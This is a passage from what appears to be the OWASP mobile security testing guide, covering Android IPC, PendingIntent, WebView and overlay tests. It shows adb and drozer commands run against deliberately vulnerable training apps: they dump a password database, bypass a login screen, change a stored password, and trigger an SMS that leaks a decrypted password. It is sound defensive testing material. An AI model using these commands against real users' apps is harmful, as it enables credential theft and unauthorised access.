). We still don't know if they are being used. The information above reveals useful information that you can use now to reverse engineer the app. See the section \"Check the Handler Method\" to learn about things you should consider.
WebViewActivity.kt
com.mstg.deeplinkdemo.WebViewActivity
onCreate
Sometimes you can even take advantage of other applications that you know interact with your target app. You can reverse engineer the app, (e.g. to extract all strings and filter those which include the target deep links, deeplinkdemo:///load.html
in the previous case), or use them as triggers, while hooking the app as previously discussed.
To test for sensitive functionality exposure through IPC mechanisms you should first enumerate all the IPC mechanisms the app uses and then try to identify whether sensitive data is leaked when the mechanisms are used.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#static-analysis","title":"Static Analysis","text":"We start by looking at the AndroidManifest.xml, where all activities, services, and content providers included in the app must be declared (otherwise the system won't recognize them and they won't run).
<intent-filter>
<service>
<provider>
<receiver>
An \"exported\" activity, service, or content can be accessed by other apps. There are two common ways to designate a component as exported. The obvious one is setting the export tag to true android:exported=\"true\"
. The second way involves defining an <intent-filter>
within the component element (<activity>
, <service>
, <receiver>
). When this is done, the export tag is automatically set to \"true\". To prevent all other Android apps from interacting with the IPC component element, be sure that the android:exported=\"true\"
value and an <intent-filter>
aren't in their AndroidManifest.xml
files unless this is necessary.
Remember that using the permission tag (android:permission
) will also limit other applications' access to a component. If your IPC is intended to be accessible to other applications, you can apply a security policy with the <permission>
element and set a proper android:protectionLevel
. When android:permission
is used in a service declaration, other applications must declare a corresponding <uses-permission>
element in their own manifest to start, stop, or bind to the service.
For more information about the content providers, please refer to the test case \"Testing Whether Stored Sensitive Data Is Exposed via IPC Mechanisms\" in chapter \"Testing Data Storage\".
Once you identify a list of IPC mechanisms, review the source code to see whether sensitive data is leaked when the mechanisms are used. For example, content providers can be used to access database information, and services can be probed to see if they return data. Broadcast receivers can leak sensitive information if probed or sniffed.
In the following, we use two example apps and give examples of identifying vulnerable IPC components:
In the \"Sieve\" app, we find three exported activities, identified by <activity>
:
<activity android:excludeFromRecents=\"true\" android:label=\"@string/app_name\" android:launchMode=\"singleTask\" android:name=\".MainLoginActivity\" android:windowSoftInputMode=\"adjustResize|stateVisible\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n <category android:name=\"android.intent.category.LAUNCHER\" />\n </intent-filter>\n</activity>\n<activity android:clearTaskOnLaunch=\"true\" android:excludeFromRecents=\"true\" android:exported=\"true\" android:finishOnTaskLaunch=\"true\" android:label=\"@string/title_activity_file_select\" android:name=\".FileSelectActivity\" />\n<activity android:clearTaskOnLaunch=\"true\" android:excludeFromRecents=\"true\" android:exported=\"true\" android:finishOnTaskLaunch=\"true\" android:label=\"@string/title_activity_pwlist\" android:name=\".PWList\" />\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-source-code","title":"Inspect the Source Code","text":"By inspecting the PWList.java
activity, we see that it offers options to list all keys, add, delete, etc. If we invoke it directly, we will be able to bypass the LoginActivity. More on this can be found in the dynamic analysis below.
In the \"Sieve\" app, we find two exported services, identified by <service>
:
<service android:exported=\"true\" android:name=\".AuthService\" android:process=\":remote\" />\n<service android:exported=\"true\" android:name=\".CryptoService\" android:process=\":remote\" />\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-source-code_1","title":"Inspect the Source Code","text":"Check the source code for the class android.app.Service
:
By reversing the target application, we can see that the service AuthService
provides functionality for changing the password and PIN-protecting the target app.
public void handleMessage(Message msg) {\n AuthService.this.responseHandler = msg.replyTo;\n Bundle returnBundle = msg.obj;\n int responseCode;\n int returnVal;\n switch (msg.what) {\n ...\n case AuthService.MSG_SET /*6345*/:\n if (msg.arg1 == AuthService.TYPE_KEY) /*7452*/ {\n responseCode = 42;\n if (AuthService.this.setKey(returnBundle.getString(\"com.mwr.example.sieve.PASSWORD\"))) {\n returnVal = 0;\n } else {\n returnVal = 1;\n }\n } else if (msg.arg1 == AuthService.TYPE_PIN) {\n responseCode = 41;\n if (AuthService.this.setPin(returnBundle.getString(\"com.mwr.example.sieve.PIN\"))) {\n returnVal = 0;\n } else {\n returnVal = 1;\n }\n } else {\n sendUnrecognisedMessage();\n return;\n }\n }\n }\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#broadcast-receivers","title":"Broadcast Receivers","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-androidmanifest_2","title":"Inspect the AndroidManifest","text":"In the \"Android Insecure Bank\" app, we find a broadcast receiver in the manifest, identified by <receiver>
:
<receiver android:exported=\"true\" android:name=\"com.android.insecurebankv2.MyBroadCastReceiver\">\n <intent-filter>\n <action android:name=\"theBroadcast\" />\n </intent-filter>\n</receiver>\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-source-code_2","title":"Inspect the Source Code","text":"Search the source code for strings like sendBroadcast
, sendOrderedBroadcast
, and sendStickyBroadcast
. Make sure that the application doesn't send any sensitive data.
If an Intent is broadcasted and received within the application only, LocalBroadcastManager
can be used to prevent other apps from receiving the broadcast message. This reduces the risk of leaking sensitive information.
To understand more about what the receiver is intended to do, we have to go deeper in our static analysis and search for usage of the class android.content.BroadcastReceiver
and the Context.registerReceiver
method, which is used to dynamically create receivers.
The following extract of the target application's source code shows that the broadcast receiver triggers transmission of an SMS message containing the user's decrypted password.
public class MyBroadCastReceiver extends BroadcastReceiver {\n String usernameBase64ByteString;\n public static final String MYPREFS = \"mySharedPreferences\";\n\n @Override\n public void onReceive(Context context, Intent intent) {\n // TODO Auto-generated method stub\n\n String phn = intent.getStringExtra(\"phonenumber\");\n String newpass = intent.getStringExtra(\"newpass\");\n\n if (phn != null) {\n try {\n SharedPreferences settings = context.getSharedPreferences(MYPREFS, Context.MODE_WORLD_READABLE);\n final String username = settings.getString(\"EncryptedUsername\", null);\n byte[] usernameBase64Byte = Base64.decode(username, Base64.DEFAULT);\n usernameBase64ByteString = new String(usernameBase64Byte, \"UTF-8\");\n final String password = settings.getString(\"superSecurePassword\", null);\n CryptoClass crypt = new CryptoClass();\n String decryptedPassword = crypt.aesDeccryptedString(password);\n String textPhoneno = phn.toString();\n String textMessage = \"Updated Password from: \"+decryptedPassword+\" to: \"+newpass;\n SmsManager smsManager = SmsManager.getDefault();\n System.out.println(\"For the changepassword - phonenumber: \"+textPhoneno+\" password is: \"+textMessage);\nsmsManager.sendTextMessage(textPhoneno, null, textMessage, null, null);\n }\n }\n }\n}\n
BroadcastReceivers should use the android:permission
attribute; otherwise, other applications can invoke them. You can use Context.sendBroadcast(intent, receiverPermission);
to specify permissions a receiver must have to read the broadcast. You can also set an explicit application package name that limits the components this Intent will resolve to. If left as the default value (null), all components in all applications will be considered. If non-null, the Intent can match only the components in the given application package.
You can enumerate IPC components with MobSF. To list all exported IPC components, upload the APK file and the components collection will be displayed in the following screen:
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#content-providers","title":"Content Providers","text":"The \"Sieve\" application implements a vulnerable content provider. To list the content providers exported by the Sieve app, execute the following command:
$ adb shell dumpsys package com.mwr.example.sieve | grep -Po \"Provider{[\\w\\d\\s\\./]+}\" | sort -u\nProvider{34a20d5 com.mwr.example.sieve/.FileBackupProvider}\nProvider{64f10ea com.mwr.example.sieve/.DBContentProvider}\n
Once identified, you can use jadx to reverse engineer the app and analyze the source code of the exported content providers to identify potential vulnerabilities.
To identify the corresponding class of a content provider, use the following information:
com.mwr.example.sieve
.DBContentProvider
.When analyzing the class com.mwr.example.sieve.DBContentProvider
, you'll see that it contains several URIs:
package com.mwr.example.sieve;\n...\npublic class DBContentProvider extends ContentProvider {\n public static final Uri KEYS_URI = Uri.parse(\"content://com.mwr.example.sieve.DBContentProvider/Keys\");\n public static final Uri PASSWORDS_URI = Uri.parse(\"content://com.mwr.example.sieve.DBContentProvider/Passwords\");\n...\n}\n
Use the following commands to call the content provider using the identified URIs:
$ adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Keys/\nRow: 0 Password=1234567890AZERTYUIOPazertyuiop, pin=1234\n\n$ adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords/\nRow: 0 _id=1, service=test, username=test, password=BLOB, email=t@tedt.com\nRow: 1 _id=2, service=bank, username=owasp, password=BLOB, email=user@tedt.com\n\n$ adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection email:username:password --where 'service=\\\"bank\\\"'\nRow: 0 email=user@tedt.com, username=owasp, password=BLOB\n
You are able now to retrieve all database entries (see all lines starting with \"Row:\" in the output).
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#activities_1","title":"Activities","text":"To list activities exported by an application, you can use the following command and focus on activity
elements:
$ aapt d xmltree sieve.apk AndroidManifest.xml\n...\nE: activity (line=32)\n A: android:label(0x01010001)=@0x7f05000f\n A: android:name(0x01010003)=\".FileSelectActivity\" (Raw: \".FileSelectActivity\")\n A: android:exported(0x01010010)=(type 0x12)0xffffffff\n A: android:finishOnTaskLaunch(0x01010014)=(type 0x12)0xffffffff\n A: android:clearTaskOnLaunch(0x01010015)=(type 0x12)0xffffffff\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\nE: activity (line=40)\n A: android:label(0x01010001)=@0x7f050000\n A: android:name(0x01010003)=\".MainLoginActivity\" (Raw: \".MainLoginActivity\")\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\n A: android:launchMode(0x0101001d)=(type 0x10)0x2\n A: android:windowSoftInputMode(0x0101022b)=(type 0x11)0x14\n E: intent-filter (line=46)\n E: action (line=47)\n A: android:name(0x01010003)=\"android.intent.action.MAIN\" (Raw: \"android.intent.action.MAIN\")\n E: category (line=49)\n A: android:name(0x01010003)=\"android.intent.category.LAUNCHER\" (Raw: \"android.intent.category.LAUNCHER\")\nE: activity (line=52)\n A: android:label(0x01010001)=@0x7f050009\n A: android:name(0x01010003)=\".PWList\" (Raw: \".PWList\")\n A: android:exported(0x01010010)=(type 0x12)0xffffffff\n A: android:finishOnTaskLaunch(0x01010014)=(type 0x12)0xffffffff\n A: android:clearTaskOnLaunch(0x01010015)=(type 0x12)0xffffffff\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\nE: activity (line=60)\n A: android:label(0x01010001)=@0x7f05000a\n A: android:name(0x01010003)=\".SettingsActivity\" (Raw: \".SettingsActivity\")\n A: android:finishOnTaskLaunch(0x01010014)=(type 0x12)0xffffffff\n A: android:clearTaskOnLaunch(0x01010015)=(type 0x12)0xffffffff\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\n...\n
You can identify an exported activity using one of the following properties:
intent-filter
sub declaration.android:exported
to 0xffffffff
.You can also use jadx to identify exported activities in the file AndroidManifest.xml
using the criteria described above:
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"com.mwr.example.sieve\">\n...\n <!-- This activity is exported via the attribute \"exported\" -->\n <activity android:name=\".FileSelectActivity\" android:exported=\"true\" />\n <!-- This activity is exported via the \"intent-filter\" declaration -->\n <activity android:name=\".MainLoginActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\"/>\n <category android:name=\"android.intent.category.LAUNCHER\"/>\n </intent-filter>\n </activity>\n <!-- This activity is exported via the attribute \"exported\" -->\n <activity android:name=\".PWList\" android:exported=\"true\" />\n <!-- Activities below are not exported -->\n <activity android:name=\".SettingsActivity\" />\n <activity android:name=\".AddEntryActivity\"/>\n <activity android:name=\".ShortLoginActivity\" />\n <activity android:name=\".WelcomeActivity\" />\n <activity android:name=\".PINActivity\" />\n...\n</manifest>\n
Enumerating activities in the vulnerable password manager \"Sieve\" shows that the following activities are exported:
.MainLoginActivity
.PWList
.FileSelectActivity
Use the command below to launch an activity:
# Start the activity without specifying an action or an category\n$ adb shell am start -n com.mwr.example.sieve/.PWList\nStarting: Intent { cmp=com.mwr.example.sieve/.PWList }\n\n# Start the activity indicating an action (-a) and an category (-c)\n$ adb shell am start -n \"com.mwr.example.sieve/.MainLoginActivity\" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER\nStarting: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.mwr.example.sieve/.MainLoginActivity }\n
Since the activity .PWList
is called directly in this example, you can use it to bypass the login form protecting the password manager, and access the data contained within the password manager.
Services can be enumerated with the Drozer module app.service.info
:
dz> run app.service.info -a com.mwr.example.sieve\nPackage: com.mwr.example.sieve\n com.mwr.example.sieve.AuthService\n Permission: null\n com.mwr.example.sieve.CryptoService\n Permission: null\n
To communicate with a service, you must first use static analysis to identify the required inputs.
Because this service is exported, you can use the module app.service.send
to communicate with the service and change the password stored in the target application:
dz> run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 6345 7452 1 --extra string com.mwr.example.sieve.PASSWORD \"abcdabcdabcdabcd\" --bundle-as-obj\nGot a reply from com.mwr.example.sieve/com.mwr.example.sieve.AuthService:\n what: 4\n arg1: 42\n arg2: 0\n Empty\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#broadcast-receivers_1","title":"Broadcast Receivers","text":"To list broadcast receivers exported by an application, you can use the following command and focus on receiver
elements:
$ aapt d xmltree InsecureBankv2.apk AndroidManifest.xml\n...\nE: receiver (line=88)\n A: android:name(0x01010003)=\"com.android.insecurebankv2.MyBroadCastReceiver\" (Raw: \"com.android.insecurebankv2.MyBroadCastReceiver\")\n A: android:exported(0x01010010)=(type 0x12)0xffffffff\n E: intent-filter (line=91)\n E: action (line=92)\n A: android:name(0x01010003)=\"theBroadcast\" (Raw: \"theBroadcast\")\nE: receiver (line=119)\n A: android:name(0x01010003)=\"com.google.android.gms.wallet.EnableWalletOptimizationReceiver\" (Raw: \"com.google.android.gms.wallet.EnableWalletOptimizationReceiver\")\n A: android:exported(0x01010010)=(type 0x12)0x0\n E: intent-filter (line=122)\n E: action (line=123)\n A: android:name(0x01010003)=\"com.google.android.gms.wallet.ENABLE_WALLET_OPTIMIZATION\" (Raw: \"com.google.android.gms.wallet.ENABLE_WALLET_OPTIMIZATION\")\n...\n
You can identify an exported broadcast receiver using one of the following properties:
intent-filter
sub declaration.android:exported
set to 0xffffffff
.You can also use jadx to identify exported broadcast receivers in the file AndroidManifest.xml
using the criteria described above:
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"com.android.insecurebankv2\">\n...\n <!-- This broadcast receiver is exported via the attribute \"exported\" as well as the \"intent-filter\" declaration -->\n <receiver android:name=\"com.android.insecurebankv2.MyBroadCastReceiver\" android:exported=\"true\">\n <intent-filter>\n <action android:name=\"theBroadcast\"/>\n </intent-filter>\n </receiver>\n <!-- This broadcast receiver is NOT exported because the attribute \"exported\" is explicitly set to false -->\n <receiver android:name=\"com.google.android.gms.wallet.EnableWalletOptimizationReceiver\" android:exported=\"false\">\n <intent-filter>\n <action android:name=\"com.google.android.gms.wallet.ENABLE_WALLET_OPTIMIZATION\"/>\n </intent-filter>\n </receiver>\n...\n</manifest>\n
The above example from the vulnerable banking application InsecureBankv2 shows that only the broadcast receiver named com.android.insecurebankv2.MyBroadCastReceiver
is exported.
Now that you know that there is an exported broadcast receiver, you can dive deeper and reverse engineer the app using jadx. This will allow you to analyze the source code searching for potential vulnerabilities that you could later try to exploit. The source code of the exported broadcast receiver is the following:
package com.android.insecurebankv2;\n...\npublic class MyBroadCastReceiver extends BroadcastReceiver {\n public static final String MYPREFS = \"mySharedPreferences\";\n String usernameBase64ByteString;\n\n public void onReceive(Context context, Intent intent) {\n String phn = intent.getStringExtra(\"phonenumber\");\n String newpass = intent.getStringExtra(\"newpass\");\n if (phn != null) {\n try {\n SharedPreferences settings = context.getSharedPreferences(\"mySharedPreferences\", 1);\n this.usernameBase64ByteString = new String(Base64.decode(settings.getString(\"EncryptedUsername\", (String) null), 0), \"UTF-8\");\n String decryptedPassword = new CryptoClass().aesDeccryptedString(settings.getString(\"superSecurePassword\", (String) null));\n String textPhoneno = phn.toString();\n String textMessage = \"Updated Password from: \" + decryptedPassword + \" to: \" + newpass;\n SmsManager smsManager = SmsManager.getDefault();\n System.out.println(\"For the changepassword - phonenumber: \" + textPhoneno + \" password is: \" + textMessage);\n smsManager.sendTextMessage(textPhoneno, (String) null, textMessage, (PendingIntent) null, (PendingIntent) null);\n } catch (Exception e) {\n e.printStackTrace();\n }\n } else {\n System.out.println(\"Phone number is null\");\n }\n }\n}\n
As you can see in the source code, this broadcast receiver expects two parameters named phonenumber
and newpass
. With this information you can now try to exploit this broadcast receiver by sending events to it using custom values:
# Send an event with the following properties:\n# Action is set to \"theBroadcast\"\n# Parameter \"phonenumber\" is set to the string \"07123456789\"\n# Parameter \"newpass\" is set to the string \"12345\"\n$ adb shell am broadcast -a theBroadcast --es phonenumber \"07123456789\" --es newpass \"12345\"\nBroadcasting: Intent { act=theBroadcast flg=0x400000 (has extras) }\nBroadcast completed: result=0\n
This generates the following SMS:
Updated Password from: SecretPassword@ to: 12345\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#sniffing-intents","title":"Sniffing Intents","text":"If an Android application broadcasts intents without setting a required permission or specifying the destination package, the intents can be monitored by any application that runs on the device.
To register a broadcast receiver to sniff intents, use the Drozer module app.broadcast.sniff
and specify the action to monitor with the --action
parameter:
dz> run app.broadcast.sniff --action theBroadcast\n[*] Broadcast receiver registered to sniff matching intents\n[*] Output is updated once a second. Press Control+C to exit.\n\nAction: theBroadcast\nRaw: Intent { act=theBroadcast flg=0x10 (has extras) }\nExtra: phonenumber=07123456789 (java.lang.String)\nExtra: newpass=12345 (java.lang.String)`\n
You can also use the following command to sniff the intents. However, the content of the extras passed will not be displayed:
$ adb shell dumpsys activity broadcasts | grep \"theBroadcast\"\nBroadcastRecord{fc2f46f u0 theBroadcast} to user 0\nIntent { act=theBroadcast flg=0x400010 (has extras) }\nBroadcastRecord{7d4f24d u0 theBroadcast} to user 0\nIntent { act=theBroadcast flg=0x400010 (has extras) }\n45: act=theBroadcast flg=0x400010 (has extras)\n46: act=theBroadcast flg=0x400010 (has extras)\n121: act=theBroadcast flg=0x400010 (has extras)\n144: act=theBroadcast flg=0x400010 (has extras)\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/","title":"Testing for Vulnerable Implementation of PendingIntent","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/#overview","title":"Overview","text":"When testing Pending Intents you must ensure that they are immutable and that the app explicitly specifies the exact package, action, and component that will receive the base intent.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/#static-analysis","title":"Static Analysis","text":"To identify vulnerable implementations, static analysis can be performed by looking for API calls used for obtaining a PendingIntent
. Such APIs are listed below:
PendingIntent getActivity(Context, int, Intent, int)\nPendingIntent getActivity(Context, int, Intent, int, Bundle)\nPendingIntent getActivities(Context, int, Intent, int, Bundle)\nPendingIntent getActivities(Context, int, Intent, int)\nPendingIntent getForegroundService(Context, int, Intent, int)\nPendingIntent getService(Context, int, Intent, int)\n
Once any of the above function is spotted, check the implementation of the base intent and the PendingIntent
for the security pitfalls listed in the Pending Intents section.
For example, in A-156959408(CVE-2020-0389), the base intent is implicit and also the PendingIntent
is mutable, thus making it exploitable.
private Notification createSaveNotification(Uri uri) {\n Intent viewIntent = new Intent(Intent.ACTION_VIEW)\n .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_GRANT_READ_URI_PERMISSION)\n .setDataAndType(uri, \"video/mp4\"); //Implicit Intent\n\n//... skip ...\n\n\nNotification.Builder builder = new Notification.Builder(this, CHANNEL_ID)\n .setSmallIcon(R.drawable.ic_android)\n .setContentTitle(getResources().getString(R.string.screenrecord_name))\n .setContentText(getResources().getString(R.string.screenrecord_save_message))\n .setContentIntent(PendingIntent.getActivity(\n this,\n REQUEST_CODE,\n viewIntent,\n Intent.FLAG_GRANT_READ_URI_PERMISSION)) // Mutable PendingIntent.\n .addAction(shareAction)\n .addAction(deleteAction)\n .setAutoCancel(true);\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/#dynamic-analysis","title":"Dynamic Analysis","text":"Frida can be used to hook the APIs used to get a PendingIntent
. This information can be used to determine the code location of the call, which can be further used to perform static analysis as described above.
Here's an example of such a Frida script that can be used to hook the PendingIntent.getActivity
function:
var pendingIntent = Java.use('android.app.PendingIntent');\n\nvar getActivity_1 = pendingIntent.getActivity.overload(\"android.content.Context\", \"int\", \"android.content.Intent\", \"int\");\n\ngetActivity_1.implementation = function(context, requestCode, intent, flags){\n console.log(\"[*] Calling PendingIntent.getActivity(\"+intent.getAction()+\")\");\n console.log(\"\\t[-] Base Intent toString: \" + intent.toString());\n console.log(\"\\t[-] Base Intent getExtras: \" + intent.getExtras());\n console.log(\"\\t[-] Base Intent getFlags: \" + intent.getFlags());\n return this.getActivity(context, requestCode, intent, flags);\n}\n
This approach can be helpful when dealing with applications with large code bases, where determining the control flow can sometimes be tricky.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/","title":"Testing JavaScript Execution in WebViews","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#overview","title":"Overview","text":"To test for JavaScript execution in WebViews check the app for WebView usage and evaluate whether or not each WebView should allow JavaScript execution. If JavaScript execution is required for the app to function normally, then you need to ensure that the app follows the all best practices.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#static-analysis","title":"Static Analysis","text":"To create and use a WebView, an app must create an instance of the WebView
class.
WebView webview = new WebView(this);\nsetContentView(webview);\nwebview.loadUrl(\"https://www.owasp.org/\");\n
Various settings can be applied to the WebView (activating/deactivating JavaScript is one example). JavaScript is disabled by default for WebViews and must be explicitly enabled. Look for the method setJavaScriptEnabled
to check for JavaScript activation.
webview.getSettings().setJavaScriptEnabled(true);\n
This allows the WebView to interpret JavaScript. It should be enabled only if necessary to reduce the attack surface to the app. If JavaScript is necessary, you should make sure that
To remove all JavaScript source code and locally stored data, clear the WebView's cache with clearCache
when the app closes.
Devices running platforms older than Android 4.4 (API level 19) use a version of WebKit that has several security issues. As a workaround, the app must confirm that WebView objects display only trusted content if the app runs on these devices.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#dynamic-analysis","title":"Dynamic Analysis","text":"Dynamic Analysis depends on operating conditions. There are several ways to inject JavaScript into an app's WebView:
To address these attack vectors, check the following:
Only files that are in the app data directory should be rendered in a WebView (see test case \"Testing for Local File Inclusion in WebViews\").
The HTTPS communication must be implemented according to best practices to avoid MITM attacks. This means:
To test for WebView protocol handlers check the app for WebView usage and evaluate whether or not the WebView should have resource access. If resource access is necessary you need to verify that it's implemented following best practices.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0032/#static-analysis","title":"Static Analysis","text":"Check the source code for WebView usage. The following WebView settings control resource access:
setAllowContentAccess
: Content URL access allows WebViews to load content from a content provider installed on the system, which is enabled by default .setAllowFileAccess
: Enables and disables file access within a WebView. The default value is true
when targeting Android 10 (API level 29) and below and false
for Android 11 (API level 30) and above. Note that this enables and disables file system access only. Asset and resource access is unaffected and accessible via file:///android_asset
and file:///android_res
.setAllowFileAccessFromFileURLs
: Does or does not allow JavaScript running in the context of a file scheme URL to access content from other file scheme URLs. The default value is true
for Android 4.0.3 - 4.0.4 (API level 15) and below and false
for Android 4.1 (API level 16) and above.setAllowUniversalAccessFromFileURLs
: Does or does not allow JavaScript running in the context of a file scheme URL to access content from any origin. The default value is true
for Android 4.0.3 - 4.0.4 (API level 15) and below and false
for Android 4.1 (API level 16) and above.If one or more of the above methods is/are activated, you should determine whether the method(s) is/are really necessary for the app to work properly.
If a WebView instance can be identified, find out whether local files are loaded with the loadURL
method.
WebView = new WebView(this);\nwebView.loadUrl(\"file:///android_asset/filename.html\");\n
The location from which the HTML file is loaded must be verified. If the file is loaded from external storage, for example, the file is readable and writable by everyone. This is considered a bad practice. Instead, the file should be placed in the app's assets directory.
webview.loadUrl(\"file:///\" +\nEnvironment.getExternalStorageDirectory().getPath() +\n\"filename.html\");\n
The URL specified in loadURL
should be checked for dynamic parameters that can be manipulated; their manipulation may lead to local file inclusion.
Use the following code snippet and best practices to deactivate protocol handlers, if applicable:
//If attackers can inject script into a WebView, they could access local resources. This can be prevented by disabling local file system access, which is enabled by default. You can use the Android WebSettings class to disable local file system access via the public method `setAllowFileAccess`.\nwebView.getSettings().setAllowFileAccess(false);\n\nwebView.getSettings().setAllowFileAccessFromFileURLs(false);\n\nwebView.getSettings().setAllowUniversalAccessFromFileURLs(false);\n\nwebView.getSettings().setAllowContentAccess(false);\n
To identify the usage of protocol handlers, look for ways to trigger phone calls and ways to access files from the file system while you're using the app.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0033/","title":"Testing for Java Objects Exposed Through WebViews","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0033/#overview","title":"Overview","text":"To test for Java objects exposed through WebViews check the app for WebViews having JavaScript enabled and determine whether the WebView is creating any JavaScript interfaces aka. \"JavaScript Bridges\". Finally, check whether an attacker could potentially inject malicious JavaScript code.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0033/#static-analysis","title":"Static Analysis","text":"The following example shows how addJavascriptInterface
is used to bridge a Java Object and JavaScript in a WebView:
WebView webview = new WebView(this);\nWebSettings webSettings = webview.getSettings();\nwebSettings.setJavaScriptEnabled(true);\n\nMSTG_ENV_008_JS_Interface jsInterface = new MSTG_ENV_008_JS_Interface(this);\n\nmyWebView.addJavascriptInterface(jsInterface, \"Android\");\nmyWebView.loadURL(\"http://example.com/file.html\");\nsetContentView(myWebView);\n
In Android 4.2 (API level 17) and above, an annotation @JavascriptInterface
explicitly allows JavaScript to access a Java method.
public class MSTG_ENV_008_JS_Interface {\n\n Context mContext;\n\n /** Instantiate the interface and set the context */\n MSTG_ENV_005_JS_Interface(Context c) {\n mContext = c;\n }\n\n @JavascriptInterface\n public String returnString () {\n return \"Secret String\";\n }\n\n /** Show a toast from the web page */\n @JavascriptInterface\n public void showToast(String toast) {\n Toast.makeText(mContext, toast, Toast.LENGTH_SHORT).show();\n }\n}\n
This is how you can call the method returnString
from JavaScript, the string \"Secret String\" will be stored in the variable result
:
var result = window.Android.returnString();\n
With access to the JavaScript code, via, for example, stored XSS or a MITM attack, an attacker can directly call the exposed Java methods.
If addJavascriptInterface
is necessary, take the following considerations:
WebView.getUrl
).<uses-sdk android:minSdkVersion=\"17\" />
).Dynamic analysis of the app can show you which HTML or JavaScript files are loaded and which vulnerabilities are present. The procedure for exploiting the vulnerability starts with producing a JavaScript payload and injecting it into the file that the app is requesting. The injection can be accomplished via a MITM attack or direct modification of the file if it is stored in external storage. The whole process can be accomplished via Drozer and weasel (MWR's advanced exploitation payload), which can install a full agent, injecting a limited agent into a running process or connecting a reverse shell as a Remote Access Tool (RAT).
A full description of the attack is included in the blog article \"WebView addJavascriptInterface Remote Code Execution\".
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0035/","title":"Testing for Overlay Attacks","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0035/#overview","title":"Overview","text":"To test for overlay attacks you need to check the app for usage of certain APIs and attributed typically used to protect against overlay attacks as well as check the Android version that app is targeting.
To mitigate these attacks please carefully read the general guidelines about Android View security in the Android Developer Documentation. For instance, the so-called touch filtering is a common defense against tapjacking, which contributes to safeguarding users against these vulnerabilities, usually in combination with other techniques and considerations as we introduce in this section.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0035/#static-analysis","title":"Static Analysis","text":"To start your static analysis you can check the app for the following methods and attributes (non-exhaustive list):
onFilterTouchEventForSecurity
for more fine-grained control and to implement a custom security policy for views.android:filterTouchesWhenObscured
to true or call setFilterTouchesWhenObscured
.Some attributes might affect the app as a whole, while others can be applied to specific components. The latter would be the case when, for example, there is a business need to specifically allow overlays while wanting to protect sensitive input UI elements. The developers might also take additional precautions to confirm the user's actual intent which might be legitimate and tell it apart from a potential attack.
As a final note, always remember to properly check the API level that app is targeting and the implications that this has. For instance, Android 8.0 (API level 26) introduced changes to apps requiring SYSTEM_ALERT_WINDOW
(\"draw on top\"). From this API level on, apps using TYPE_APPLICATION_OVERLAY
will be always shown above other windows having other types such as TYPE_SYSTEM_OVERLAY
or TYPE_SYSTEM_ALERT
. You can use this information to ensure that no overlay attacks may occur at least for this app in this concrete Android version.
Abusing this kind of vulnerability on a dynamic manner can be pretty challenging and very specialized as it closely depends on the target Android version. For instance, for versions up to Android 7.0 (API level 24) you can use the following APKs as a proof of concept to identify the existence of the vulnerabilities.
To test for WebViews cleanup you should inspect all APIs related to WebView data deletion and try to fully track the data deletion process.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0037/#static-analysis","title":"Static Analysis","text":"Start by identifying the usage of the following WebView APIs and carefully validate the mentioned best practices.
Initialization: an app might be initializing the WebView in a way to avoid storing certain information by using setDomStorageEnabled
, setAppCacheEnabled
or setDatabaseEnabled
from android.webkit.WebSettings
. The DOM Storage (for using the HTML5 local storage), Application Caches and Database Storage APIs are disabled by default, but apps might set these settings explicitly to \"true\".
Cache: Android's WebView class offers the clearCache
method which can be used to clear the cache for all WebViews used by the app. It receives a boolean input parameter (includeDiskFiles
